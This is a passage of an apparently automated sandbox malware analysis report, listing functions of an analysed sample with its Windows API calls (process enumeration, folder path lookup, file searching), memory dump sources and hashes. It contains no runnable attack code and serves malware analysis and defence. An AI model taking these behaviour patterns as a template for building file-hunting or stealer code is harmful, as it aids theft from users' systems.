                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 6949a52ea3ad82e294acb8923d84d8d666e506927f518bbf53c71851cdd34688
                              • Instruction ID: a7e09c638558bcaef452aa8ae0165a59b89b34c13e45e26d2f87e75e179e21ab
                              • Opcode Fuzzy Hash: 6949a52ea3ad82e294acb8923d84d8d666e506927f518bbf53c71851cdd34688
                              • Instruction Fuzzy Hash: 77314F71911118ABCB24EF96CC65FEEB778FB45704F10419FF10AA22A0DB386A45CFA5
                              Function 0053FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0053FE13
                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0053FE2C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Value___vcrt_
                              • String ID:
                              • API String ID: 1426506684-0
                              • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                              • Instruction ID: 793e6b7b1b12c5b0850b3e851841690a76e792d6b80ca47ff006f26dc6fb26c0
                              • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                              • Instruction Fuzzy Hash: BC01B132509B22AEF67426B45CCD9A63F98FB417B9F30473AF21A801F2EF514C85A244
                              Function 004DCA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 004DCA7E
                                • Part of subcall function 004DC2A0: __amsg_exit.LIBCMT ref: 004DC2B0
                              • __getptd.LIBCMT ref: 004DCA95
                              • __amsg_exit.LIBCMT ref: 004DCAA3
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 004DCAC7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 637a0b263e86d0f66b36f5735a2b213dfb1cdd3d21d423f3fdbf992d299ab1fe
                              • Instruction ID: 9118e42ae27afc73943ad828877ca11e171699a2bdc09d94d04a62fc3e82ed86
                              • Opcode Fuzzy Hash: 637a0b263e86d0f66b36f5735a2b213dfb1cdd3d21d423f3fdbf992d299ab1fe
                              • Instruction Fuzzy Hash: A3F06232944316DBD620FBAA589674E73A0AF00718F11014FF404963D2DB6C5941D6DD
                              Function 005404D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Catch
                              • String ID: MOC$RCC
                              • API String ID: 78271584-2084237596
                              • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                              • Instruction ID: 3822924616a77a6c1585da1f1055ed3713055d0851c6b43fd6bcaf8701f56630
                              • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                              • Instruction Fuzzy Hash: 59415871900209AFCF16DF98D885AEEBFB5FF48308F289099FA04A7251D3359A50DF50
                              Function 004D5190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004D8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004D8F9B
                              • lstrcat.KERNEL32(?,00000000), ref: 004D51CA
                              • lstrcat.KERNEL32(?,004E1058), ref: 004D51E7
                              • lstrcat.KERNEL32(?,012A8F78), ref: 004D51FB
                              • lstrcat.KERNEL32(?,004E105C), ref: 004D520D
                                • Part of subcall function 004D4B60: wsprintfA.USER32 ref: 004D4B7C
                                • Part of subcall function 004D4B60: FindFirstFileA.KERNEL32(?,?), ref: 004D4B93
                                • Part of subcall function 004D4B60: StrCmpCA.SHLWAPI(?,004E0FC4), ref: 004D4BC1
                                • Part of subcall function 004D4B60: StrCmpCA.SHLWAPI(?,004E0FC8), ref: 004D4BD7
                                • Part of subcall function 004D4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 004D4DCD
                                • Part of subcall function 004D4B60: FindClose.KERNEL32(000000FF), ref: 004D4DE2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: b9639b68c9465897730ab12ce60dc4c6c1a3d0c9f34389cac88a2ec25a7266de
                              • Instruction ID: 81eefceb34853eca86aa31017110c1f6362e165b129976f5c70c81af684d63ba
                              • Opcode Fuzzy Hash: b9639b68c9465897730ab12ce60dc4c6c1a3d0c9f34389cac88a2ec25a7266de
                              • Instruction Fuzzy Hash: EF212B76900208A7CB54EB70EC52FED333CAB94300F00855FB59656291EE7CA6C9CB99